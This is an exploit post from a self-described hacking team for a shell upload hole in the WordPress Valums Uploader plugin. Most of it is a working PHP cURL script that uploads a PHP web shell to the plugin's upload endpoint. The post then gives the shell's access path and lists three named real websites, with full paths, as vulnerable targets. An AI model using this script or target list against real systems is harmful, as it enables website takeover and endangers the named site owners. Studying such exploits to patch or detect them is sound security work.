The WordPress Valums Uploader plugin suffers from a remote shell upload vulnerability. Note that this finding houses site-specific data.
ff9d417dcdb72cecdfe6693ce266a4e1d5cd7e902fc64c64b4368480a4ecf888
# Exploit Title: Wordpress Valums Uploader Shell Upload Exploit
# Date: 4-1-2013
# Author: JingoBD
# Tested on: Windows 7 And Ubuntu
# Team: BANGLADESH CYBER ARMY
# Greetz: ManInDark,Rex0Man,Evil AXE,Bedu33n,NEEL,AXIOM, And All Of My BCA Friends. They Rockz. :D
ALSO ALL BANGLADESHI Hacker Team..
=================== EXPLOIT====================
<?php
$uploadfile="bangla.php";
$ch =
curl_init("http://localhost/wordpress/VALUMS_UPLOADER_PATH/php.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access: http://localhost/wp-content/uploads/2013/01/bangla.php
Some Vulnerable Sites:
http://www.mmodels.ca/wp/wp-content/themes/lightspeed/framework/_scripts/valums_uploader/php.php
http://www.yellowfly.co.uk/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php
http://www3.mhcable.com/v2/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.phps
=========================END======================
Thanks
http://facebook.com/bdcyberarmy